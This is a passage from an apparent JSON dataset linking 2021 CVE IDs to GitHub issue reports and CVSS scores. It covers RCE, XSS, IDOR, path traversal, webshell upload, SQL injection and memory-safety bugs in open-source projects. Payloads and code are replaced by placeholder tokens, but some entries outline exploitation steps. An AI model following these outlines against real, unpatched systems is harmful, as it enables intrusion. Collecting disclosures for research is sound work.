  71324. "Repo_new": "sanluan/publiccms",
  71325. "Issue_Created_At": "2021-09-07T02:44:20Z",
  71326. "description": "The default bat file parameters are controllable, resulting in rce. In the selection of planned tasks, the parameters are controllable and repo can be echoed directly, so the parameters of the parameters will be imported into the default bat warehouse script and the executed commands can be echoed url\uff1a URLTAG FILETAG The parameters of the parameters should be controlled",
  71327. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71328. "severity": "CRITICAL",
  71329. "baseScore": 9.8,
  71330. "impactScore": 5.9,
  71331. "exploitabilityScore": 3.9
  71332. },
  71333. {
  71334. "CVE_ID": "CVE-2021-40882",
  71335. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1477",
  71336. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1477",
  71337. "Repo_new": "piwigo/piwigo",
  71338. "Issue_Created_At": "2021-09-07T03:39:07Z",
  71339. "description": "Persistent cross site scripts in Piwigo system album properties (version NUMBERTAG Description: Piwigo system album name and description of the location can be written to XSS code, resulting in persistent cross site scripting attacks Vulnerable Instances: FILETAG FILETAG",
  71340. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71341. "severity": "MEDIUM",
  71342. "baseScore": 6.1,
  71343. "impactScore": 2.7,
  71344. "exploitabilityScore": 2.8
  71345. },
  71346. {
  71347. "CVE_ID": "CVE-2021-40883",
  71348. "Issue_Url_old": "https://github.com/emlog/emlog/issues/108",
  71349. "Issue_Url_new": "https://github.com/emlog/emlog/issues/108",
  71350. "Repo_new": "emlog/emlog",
  71351. "Issue_Created_At": "2021-09-09T01:15:50Z",
  71352. "description": "emlog NUMBERTAG has RCE vulnerability. in FILETAG line NUMBERTAG FILETAG After decompression, the uploaded file will be automatically saved PATHTAG so We can add our own webshell in the plugins file downloaded from the official APITAG upload and access it FILETAG",
  71353. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71354. "severity": "CRITICAL",
  71355. "baseScore": 9.8,
  71356. "impactScore": 5.9,
  71357. "exploitabilityScore": 3.9
  71358. },
  71359. {
  71360. "CVE_ID": "CVE-2021-40884",
  71361. "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/992",
  71362. "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/992",
  71363. "Repo_new": "projectsend/projectsend",
  71364. "Issue_Created_At": "2021-09-07T05:13:56Z",
  71365. "description": "Insecure Object Reference in Files function. Dear MENTIONTAG MENTIONTAG , I have found an IDOR vulnerability in Files function. Description Because of not checking authorization in parameters ids and id , The user with uploader role can download , edit all files of users in application To Reproduce Download file NUMBERTAG Access url APITAG url NUMBERTAG Add value for id parameter from APITAG > APITAG to download all files in application FILETAG Edit File NUMBERTAG Access url APITAG NUMBERTAG Add value for id parameter from APITAG > APITAG to edit all files in application Files of user kietna on application FILETAG User kietna edit private file of admin user FILETAG FILETAG FILETAG Solution You need to check authorization for id and ids parameters, make sure that a user on the system can only interact with that user's files",
  71366. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  71367. "severity": "HIGH",
  71368. "baseScore": 8.1,
  71369. "impactScore": 5.2,
  71370. "exploitabilityScore": 2.8
  71371. },
  71372. {
  71373. "CVE_ID": "CVE-2021-40886",
  71374. "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/993",
  71375. "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/993",
  71376. "Repo_new": "projectsend/projectsend",
  71377. "Issue_Created_At": "2021-09-07T07:07:48Z",
  71378. "description": "Path traversal in Upload file function. Dear MENTIONTAG I found a Path traversal vulnerability on your application! Description Because of not checking if clause for chunks parameter and use APITAG wrapper, the user with Uploader role can add value APITAG for chunks param to bypass APITAG santitizer and add another APITAG like APITAG to use APITAG wrapper and upload file to any place of server FILETAG In Step NUMBERTAG parameter that I can control when using upload function chunk , chunks , APITAG In Step NUMBERTAG The if clause check if chunks parameter < APITAG , the APITAG parameter will be handled. So i add value APITAG for chunks param then it will pass Step NUMBERTAG and go to Step NUMBERTAG FILETAG if i don't add value for chunk then the chunk parameter goes to APITAG and add value APITAG for chunks parameter, i can pass this if FILETAG Finally, if i add APITAG different from multipart , i can call APITAG wrapper to write a file on server with APITAG like APITAG Step To Reproduce NUMBERTAG Use burpsuite to capture upload request NUMBERTAG Change Content Type header to APITAG NUMBERTAG Add APITAG APITAG NUMBERTAG The file was uploaded in webroot directory with APITAG name FILETAG Request: ERRORTAG",
  71379. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  71380. "severity": "MEDIUM",
  71381. "baseScore": 6.5,
  71382. "impactScore": 3.6,
  71383. "exploitabilityScore": 2.8
  71384. },
  71385. {
  71386. "CVE_ID": "CVE-2021-40887",
  71387. "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/994",
  71388. "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/994",
  71389. "Repo_new": "projectsend/projectsend",
  71390. "Issue_Created_At": "2021-09-07T09:04:17Z",
  71391. "description": "Path Traversal vulnerability in FILETAG . Dear MENTIONTAG , I found a Path traversal vulnerability in FILETAG Description Becase of lacking sanitization input for APITAG parameter, The attacker can add APITAG to move all of php files or any file on the system that has permissions to APITAG folder FILETAG Step To Reproduce NUMBERTAG Using burpsuite tool to capture request of FILETAG function NUMBERTAG Adding APITAG in APITAG parameter, in this step the attacker can move php files with the aim of sabotaging the system or read sentitive file in system like APITAG NUMBERTAG Then access APITAG to get a new name of file FILETAG NUMBERTAG Then access APITAG Request move APITAG file ERRORTAG FILETAG Then webroot returned Directory Listing because of moving APITAG file to APITAG folder FILETAG",
  71392. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71393. "severity": "CRITICAL",
  71394. "baseScore": 9.8,
  71395. "impactScore": 5.9,
  71396. "exploitabilityScore": 3.9
  71397. },
  71398. {
  71399. "CVE_ID": "CVE-2021-40888",
  71400. "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/995",
  71401. "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/995",
  71402. "Repo_new": "projectsend/projectsend",
  71403. "Issue_Created_At": "2021-09-08T02:13:10Z",
  71404. "description": "Reflected Cross site Scripting in APITAG function . Dear MENTIONTAG I found a vulnerability that execute malicious script of user, Description: Because of lacking of sanitizer when echo output data in APITAG function in APITAG , the low privilege user APITAG role) can call this function through FILETAG file and execute scripting code FILETAG FILETAG APITAG ERRORTAG FILETAG",
  71405. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71406. "severity": "MEDIUM",
  71407. "baseScore": 5.4,
  71408. "impactScore": 2.7,
  71409. "exploitabilityScore": 2.3
  71410. },
  71411. {
  71412. "CVE_ID": "CVE-2021-40889",
  71413. "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/19",
  71414. "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/19",
  71415. "Repo_new": "boiteasite/cmsuno",
  71416. "Issue_Created_At": "2021-09-09T04:11:04Z",
  71417. "description": "PHP Code Execution via change password function. Dear MENTIONTAG I found a security problem can lead to remote code execution in APITAG version NUMBERTAG Description: APITAG action in APITAG file call to APITAG function to write username in APITAG file when user successfully changed password, Becase of filtere without APITAG the attacker can inject malicious php code into FILETAG FILETAG APITAG FILETAG When submit username and password, php code will be executed FILETAG",
  71418. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71419. "severity": "CRITICAL",
  71420. "baseScore": 9.8,
  71421. "impactScore": 5.9,
  71422. "exploitabilityScore": 3.9
  71423. },
  71424. {
  71425. "CVE_ID": "CVE-2021-40902",
  71426. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/57",
  71427. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/57",
  71428. "Repo_new": "flatcore/flatcore-cms",
  71429. "Issue_Created_At": "2021-09-06T15:27:36Z",
  71430. "description": "Stored XSS in Index. Describe the bug Cross Site Scripting (XSS) via save Exclude URLs To Reproduce Steps to reproduce the behavior NUMBERTAG Login to flatcore CMS NUMBERTAG Click on APITAG new Page' after click APITAG NUMBERTAG Insert into a XSS payload in Exclude URLs NUMBERTAG And XSS save on : URLTAG Screenshots FILETAG XSS payload APITAG alert NUMBERTAG APITAG Desktop (please complete the following information): OS: all Browser : all Version : all Additional context The XSS attack will help the hacker get the login session of other users requiring them to have at least one APITAG new Pages\" permission.",
  71431. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71432. "severity": "MEDIUM",
  71433. "baseScore": 5.4,
  71434. "impactScore": 2.7,
  71435. "exploitabilityScore": 2.3
  71436. },
  71437. {
  71438. "CVE_ID": "CVE-2021-40921",
  71439. "Issue_Url_old": "https://github.com/dmolsen/Detector/issues/35",
  71440. "Issue_Url_new": "https://github.com/dmolsen/detector/issues/35",
  71441. "Repo_new": "dmolsen/detector",
  71442. "Issue_Created_At": "2021-09-09T08:02:29Z",
  71443. "description": "FILETAG Where the Issue Occurred The code below displays the user controlled parameter cid without sufficient sanitization: URLTAG",
  71444. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71445. "severity": "MEDIUM",
  71446. "baseScore": 6.1,
  71447. "impactScore": 2.7,
  71448. "exploitabilityScore": 2.8
  71449. },
  71450. {
  71451. "CVE_ID": "CVE-2021-40922",
  71452. "Issue_Url_old": "https://github.com/pixeline/bugs/issues/552",
  71453. "Issue_Url_new": "https://github.com/pixeline/bugs/issues/552",
  71454. "Repo_new": "pixeline/bugs",
  71455. "Issue_Created_At": "2021-09-09T08:57:52Z",
  71456. "description": "FILETAG Where the Issue Occurred The code below displays the user controlled parameter APITAG , APITAG , and email without sufficient sanitization: CVETAG CVETAG CVETAG",
  71457. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71458. "severity": "MEDIUM",
  71459. "baseScore": 6.1,
  71460. "impactScore": 2.7,
  71461. "exploitabilityScore": 2.8
  71462. },
  71463. {
  71464. "CVE_ID": "CVE-2021-40925",
  71465. "Issue_Url_old": "https://github.com/ladybirdweb/faveo-helpdesk/issues/5423",
  71466. "Issue_Url_new": "https://github.com/ladybirdweb/faveo-helpdesk/issues/5423",
  71467. "Repo_new": "ladybirdweb/faveo-helpdesk",
  71468. "Issue_Created_At": "2021-09-10T02:01:59Z",
  71469. "description": "APITAG XSS in FILETAG of bugs. Faveo Version NUMBERTAG and below versions PHP version NUMBERTAG Database Driver & Version : APITAG NUMBERTAG Server specification : Apache NUMBERTAG Turn on the APITAG in APITAG Description: Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Steps To Reproduce NUMBERTAG Go to the FILETAG NUMBERTAG Login NUMBERTAG Go tot the page with the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled input APITAG in APITAG without sufficient sanitization: URLTAG Note Although the dompdf page is accessible from localhost, it can be attacked if the localhost user clicks on the aforementioned link. Downloaded from [ ] master branch [ ] release tag NUMBERTAG",
  71470. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71471. "severity": "MEDIUM",
  71472. "baseScore": 6.1,
  71473. "impactScore": 2.7,
  71474. "exploitabilityScore": 2.8
  71475. },
  71476. {
  71477. "CVE_ID": "CVE-2021-40926",
  71478. "Issue_Url_old": "https://github.com/JamesHeinrich/getID3/issues/341",
  71479. "Issue_Url_new": "https://github.com/jamesheinrich/getid3/issues/341",
  71480. "Repo_new": "jamesheinrich/getid3",
  71481. "Issue_Created_At": "2021-09-10T03:02:54Z",
  71482. "description": "APITAG XSS in FILETAG of APITAG NUMBERTAG Describe the bug Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. To Reproduce Steps to reproduce the behavior NUMBERTAG Access to the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled parameter showtagfiles without sufficient sanitization: URLTAG",
  71483. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71484. "severity": "MEDIUM",
  71485. "baseScore": 6.1,
  71486. "impactScore": 2.7,
  71487. "exploitabilityScore": 2.8
  71488. },
  71489. {
  71490. "CVE_ID": "CVE-2021-40927",
  71491. "Issue_Url_old": "https://github.com/citelao/Spotify-for-Alfred/issues/137",
  71492. "Issue_Url_new": "https://github.com/citelao/spotify-for-alfred/issues/137",
  71493. "Repo_new": "citelao/spotify-for-alfred",
  71494. "Issue_Created_At": "2021-09-13T01:49:14Z",
  71495. "description": "APITAG XSS in FILETAG . Describe the bug Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. To Reproduce Steps to reproduce the behavior NUMBERTAG Access to the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled parameter ERRORTAG without sufficient sanitization: URLTAG",
  71496. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71497. "severity": "MEDIUM",
  71498. "baseScore": 6.1,
  71499. "impactScore": 2.7,
  71500. "exploitabilityScore": 2.8
  71501. },
  71502. {
  71503. "CVE_ID": "CVE-2021-40928",
  71504. "Issue_Url_old": "https://github.com/d8ahazard/FlexTV/issues/37",
  71505. "Issue_Url_new": "https://github.com/d8ahazard/flextv/issues/37",
  71506. "Repo_new": "d8ahazard/flextv",
  71507. "Issue_Created_At": "2021-09-13T02:14:03Z",
  71508. "description": "APITAG XSS in FILETAG of Phlex and APITAG NUMBERTAG Are you hosting your own version of Flex TV, or using the one at FILETAG Yes NUMBERTAG On what OS are you running Flex TV? Ubuntu NUMBERTAG Are you using a new instance of XAMPP, or an existing webserver? Apache NUMBERTAG Turn on the APITAG in APITAG NUMBERTAG b. If not XAMPP, what APITAG stack are you using? No NUMBERTAG Have you enabled the sockets module and ensured PHP has write access to the directory containing Flex TV? Yes Description: Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Steps To Reproduce NUMBERTAG Go to the page with the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled input APITAG in APITAG without sufficient sanitization: URLTAG For Phlex: URLTAG",
  71509. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71510. "severity": "MEDIUM",
  71511. "baseScore": 6.1,
  71512. "impactScore": 2.7,
  71513. "exploitabilityScore": 2.8
  71514. },
  71515. {
  71516. "CVE_ID": "CVE-2021-40940",
  71517. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/471",
  71518. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/471",
  71519. "Repo_new": "monstra-cms/monstra",
  71520. "Issue_Created_At": "2021-09-08T14:55:01Z",
  71521. "description": "Monstra NUMBERTAG case without filtering leads to unrestricted file upload vulnerability. Brief of this vulnerability The Monstra NUMBERTAG source code does not filter the case of php, which leads to an unrestricted file upload vulnerability. Test Environment APITAG Affect version APITAG POC ERRORTAG APITAG FILETAG Reason of This Vulnerability APITAG in the Upload file module does not check whether the file extension is APITAG file\uff1a APITAG ERRORTAG Repair suggestions Add case verification at $_FILES['file']['name'], as follows: ERRORTAG",
  71522. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71523. "severity": "CRITICAL",
  71524. "baseScore": 9.8,
  71525. "impactScore": 5.9,
  71526. "exploitabilityScore": 3.9
  71527. },
  71528. {
  71529. "CVE_ID": "CVE-2021-40941",
  71530. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/644",
  71531. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/644",
  71532. "Repo_new": "axiomatic-systems/bento4",
  71533. "Issue_Created_At": "2021-08-25T02:03:31Z",
  71534. "description": "allocator is out of memory in APITAG How to reproduce: CODETAG You can see the asan information below: ERRORTAG",
  71535. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  71536. "severity": "HIGH",
  71537. "baseScore": 7.5,
  71538. "impactScore": 3.6,
  71539. "exploitabilityScore": 3.9
  71540. },
  71541. {
  71542. "CVE_ID": "CVE-2021-40942",
  71543. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1908",
  71544. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1908",
  71545. "Repo_new": "gpac/gpac",
  71546. "Issue_Created_At": "2021-09-07T10:07:06Z",
  71547. "description": "heap buffer overflow in APITAG at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...) Step to reproduce: CODETAG Env: Ubunut NUMBERTAG clang NUMBERTAG My cmd line an ASAN report APITAG add PATHTAG new new.mp4 ERRORTAG",
  71548. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71549. "severity": "MEDIUM",
  71550. "baseScore": 5.5,
  71551. "impactScore": 3.6,
  71552. "exploitabilityScore": 1.8
  71553. },
  71554. {
  71555. "CVE_ID": "CVE-2021-40943",
  71556. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/643",
  71557. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/643",
  71558. "Repo_new": "axiomatic-systems/bento4",
  71559. "Issue_Created_At": "2021-08-25T02:00:03Z",
  71560. "description": "Null pointer reference in APITAG How to reproduce: CODETAG You can see the asan information below: ERRORTAG FILETAG",
  71561. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71562. "severity": "MEDIUM",
  71563. "baseScore": 5.5,
  71564. "impactScore": 3.6,
  71565. "exploitabilityScore": 1.8
  71566. },
  71567. {
  71568. "CVE_ID": "CVE-2021-40944",
  71569. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1906",
  71570. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1906",
  71571. "Repo_new": "gpac/gpac",
  71572. "Issue_Created_At": "2021-09-01T07:25:03Z",
  71573. "description": "Null pointer reference in GPAC at PATHTAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...) Step to reproduce: CODETAG Im not sure if it's a correct usage of \"nhmlr filter\" , or by which way could i parse nhml file? Env: Ubunut NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG",
  71574. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71575. "severity": "MEDIUM",
  71576. "baseScore": 5.5,
  71577. "impactScore": 3.6,
  71578. "exploitabilityScore": 1.8
  71579. },
  71580. {
  71581. "CVE_ID": "CVE-2021-40954",
  71582. "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/11",
  71583. "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/11",
  71584. "Repo_new": "bettershop/laiketui",
  71585. "Issue_Created_At": "2021-09-10T09:35:05Z",
  71586. "description": "Any file upload exists at the background plug in. Any file upload exists at the background plug in FILETAG Locate file\uff1a PATHTAG FILETAG Firstly, the upload format is not filtered. Secondly, uploading the compressed package will decompress the index file in the compressed package and automatically include the file As a result, files with any suffix can be uploaded or compressed packages can be uploaded. The compressed packages contain webshell files FILETAG Upload succeeded\uff01 FILETAG The file is in the PATHTAG Let's visit FILETAG",
  71587. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71588. "severity": "CRITICAL",
  71589. "baseScore": 9.8,
  71590. "impactScore": 5.9,
  71591. "exploitabilityScore": 3.9
  71592. },
  71593. {
  71594. "CVE_ID": "CVE-2021-40955",
  71595. "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/12",
  71596. "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/12",
  71597. "Repo_new": "bettershop/laiketui",
  71598. "Issue_Created_At": "2021-09-10T12:12:54Z",
  71599. "description": "Background SQL injection. Background SQL injection FILETAG Parameter id is not filtered FILETAG The corresponding url is URLTAG FILETAG Using sleep function to delay NUMBERTAG seconds as an example FILETAG FILETAG Using sleep function to delay NUMBERTAG seconds as an example FILETAG Get the database through sqlmap FILETAG",
  71600. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  71601. "severity": "HIGH",
  71602. "baseScore": 7.2,
  71603. "impactScore": 5.9,
  71604. "exploitabilityScore": 1.2
  71605. },
  71606. {
  71607. "CVE_ID": "CVE-2021-40956",
  71608. "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/13",
  71609. "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/13",
  71610. "Repo_new": "bettershop/laiketui",
  71611. "Issue_Created_At": "2021-09-11T12:30:37Z",
  71612. "description": "SQL injection exists in the APITAG menu management function. SQL injection exists in the APITAG menu management function FILETAG The link where SQL injection exists is APITAG Locate the vulnerable file APITAG FILETAG Because the parameter id is not filtered, it leads to SQL injection vulnerabilities ERRORTAG Use burpsuite to request url APITAG FILETAG View SQL monitoring FILETAG Use sqlmap SQL injection Get the database FILETAG",
  71613. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71614. "severity": "HIGH",
  71615. "baseScore": 7.5,
  71616. "impactScore": 3.6,
  71617. "exploitabilityScore": 3.9
  71618. },
  71619. {
  71620. "CVE_ID": "CVE-2021-40978",
  71621. "Issue_Url_old": "https://github.com/nisdn/CVE-2021-40978/issues/1",
  71622. "Issue_Url_new": "https://github.com/nisdn/cve-2021-40978/issues/1",
  71623. "Repo_new": "nisdn/cve-2021-40978",
  71624. "Issue_Created_At": "2021-10-07T18:27:12Z",
  71625. "description": "Did you report this upstream?. Did you report this upstream?",
  71626. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71627. "severity": "HIGH",
  71628. "baseScore": 7.5,
  71629. "impactScore": 3.6,
  71630. "exploitabilityScore": 3.9
  71631. },
  71632. {
  71633. "CVE_ID": "CVE-2021-40978",
  71634. "Issue_Url_old": "https://github.com/mkdocs/mkdocs/issues/2601",
  71635. "Issue_Url_new": "https://github.com/mkdocs/mkdocs/issues/2601",
  71636. "Repo_new": "mkdocs/mkdocs",
  71637. "Issue_Created_At": "2021-10-08T03:48:27Z",
  71638. "description": "CVETAG Path Traversal.. Hey! We have verified a security flaw in the current version of APITAG a path traversal failure affecting the built in dev server. That flaw turns the server susceptible to providing data outside the scope of the application allowing anyone to request sensitive files. If you need further information, don't hesitate to get in touch with me. CVETAG URLTAG",
  71639. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71640. "severity": "HIGH",
  71641. "baseScore": 7.5,
  71642. "impactScore": 3.6,
  71643. "exploitabilityScore": 3.9
  71644. },
  71645. {
  71646. "CVE_ID": "CVE-2021-40985",
  71647. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/444",
  71648. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/444",
  71649. "Repo_new": "michaelrsweet/htmldoc",
  71650. "Issue_Created_At": "2021-08-02T07:44:48Z",
  71651. "description": "stack buffer underflow in htmldoc. os: ubuntu NUMBERTAG htmldoc version: master branch command : ./htmldoc webpage f FILETAG . APITAG FILETAG asan report ERRORTAG",
  71652. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71653. "severity": "MEDIUM",
  71654. "baseScore": 5.5,
  71655. "impactScore": 3.6,
  71656. "exploitabilityScore": 1.8
  71657. },
  71658. {
  71659. "CVE_ID": "CVE-2021-4103",
  71660. "Issue_Url_old": "https://github.com/Vanessa219/vditor/issues/1133",
  71661. "Issue_Url_new": "https://github.com/vanessa219/vditor/issues/1133",
  71662. "Repo_new": "vanessa219/vditor",
  71663. "Issue_Created_At": "2021-12-12T01:41:08Z",
  71664. "description": "XSS \u6f0f\u6d1e. APITAG",
  71665. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71666. "severity": "MEDIUM",
  71667. "baseScore": 5.4,
  71668. "impactScore": 2.7,
  71669. "exploitabilityScore": 2.3
  71670. },
  71671. {
  71672. "CVE_ID": "CVE-2021-41036",
  71673. "Issue_Url_old": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96",
  71674. "Issue_Url_new": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96",
  71675. "Repo_new": "eclipse/paho.mqtt.embedded-c",
  71676. "Issue_Created_At": "2017-06-21T06:12:07Z",
  71677. "description": "should check rem_len size in readpacket..",
  71678. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71679. "severity": "CRITICAL",
  71680. "baseScore": 9.8,
  71681. "impactScore": 5.9,
  71682. "exploitabilityScore": 3.9
  71683. },
  71684. {
  71685. "CVE_ID": "CVE-2021-41043",
  71686. "Issue_Url_old": "https://github.com/the-tcpdump-group/tcpslice/issues/11",
  71687. "Issue_Url_new": "https://github.com/the-tcpdump-group/tcpslice/issues/11",
  71688. "Repo_new": "the-tcpdump-group/tcpslice",
  71689. "Issue_Created_At": "2021-06-30T11:50:26Z",
  71690. "description": "Heap use after free. Tested on: version NUMBERTAG PRE GIT version NUMBERTAG a3 Command: tcpslice w FILETAG APITAG Segmentation fault Results NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG ffff NUMBERTAG fa7d bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffce NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG ffff NUMBERTAG fa7c in vsnprintf ( PATHTAG NUMBERTAG ffff NUMBERTAG in __snprintf_chk ( PATHTAG NUMBERTAG ffff NUMBERTAG ee in pcap_dump_open ( PATHTAG NUMBERTAG ea4 in extract_slice APITAG NUMBERTAG ea4 in main APITAG NUMBERTAG ffff NUMBERTAG a0b2 in __libc_start_main ( PATHTAG NUMBERTAG eadd in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
  71691. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71692. "severity": "MEDIUM",
  71693. "baseScore": 5.5,
  71694. "impactScore": 3.6,
  71695. "exploitabilityScore": 1.8
  71696. },
  71697. {
  71698. "CVE_ID": "CVE-2021-41061",
  71699. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16844",
  71700. "Issue_Url_new": "https://github.com/riot-os/riot/issues/16844",
  71701. "Repo_new": "riot-os/riot",
  71702. "Issue_Created_At": "2021-09-14T07:24:59Z",
  71703. "description": "ieee NUMBERTAG security: Nonce is reused after reboot. Description The frame counter used with ieee NUMBERTAG security is initialized with NUMBERTAG at startup. While it is protected against overflow, it is not protected against being reset, and that reset happens whenever the device restarts. As the key is flashed into the device in ieee NUMBERTAG security's normal operation, and the sender LL address is constant per device, the same nonce (varying only through the resetting frame counter) is used in the AES encryption multiple times. Reuse of the same (nonce, key) breaks confidentiality guarantees. (AES CCM is used here, so AIU it's not as bad URLTAG as if GCM were used, when there'd be key leakage). Steps to reproduce the issue APITAG done on microbit NUMBERTAG I have high confidence in this working on any APITAG encryption capable device). Sniff for packages, eg. by building the default module. Build the gcoap example with APITAG Send out a GET request to the sniffer module, path APITAG Repeat the request a few times (to cancel any jitter in the number of messages sent during startup) Reboot the device, eg. by power cycling it Send out GET requests to the same address, path APITAG Expected results Requests after the reboot use different sequence numbers. Actual results Requests after the reboot start from the same zero sequence number again. Requests have byte wise identical requests in regions of equal content, eg. (asterisks mine) ERRORTAG ERRORTAG APITAG the APITAG in the second row where the shared \"l\" of \"hello\" and \"well\" is, as well as the NUMBERTAG co\" of the \"core\" / \"coap\" option; variation is in MIDs (first row bytes NUMBERTAG token (second row, first NUMBERTAG bytes) and the diverting texts). Versions and cross references All since introduction in NUMBERTAG until current HEAD. Since NUMBERTAG the module in question has been marked as experimental. Disclosing this has been discussed in the closed security list URLTAG , and was deemed responsible given the overall circumstances. CVETAG CVETAG has been assigned to this issue. Road forward This is not trivial to fix, as we don't have any committed persistence inside generic devices, and even with APITAG minimal security the problem is just shifted (for FILETAG requires monotony of ASNs on the device which is equivalent to this problem, although it'd shift the attack difficulty to an active replay of old beacons). 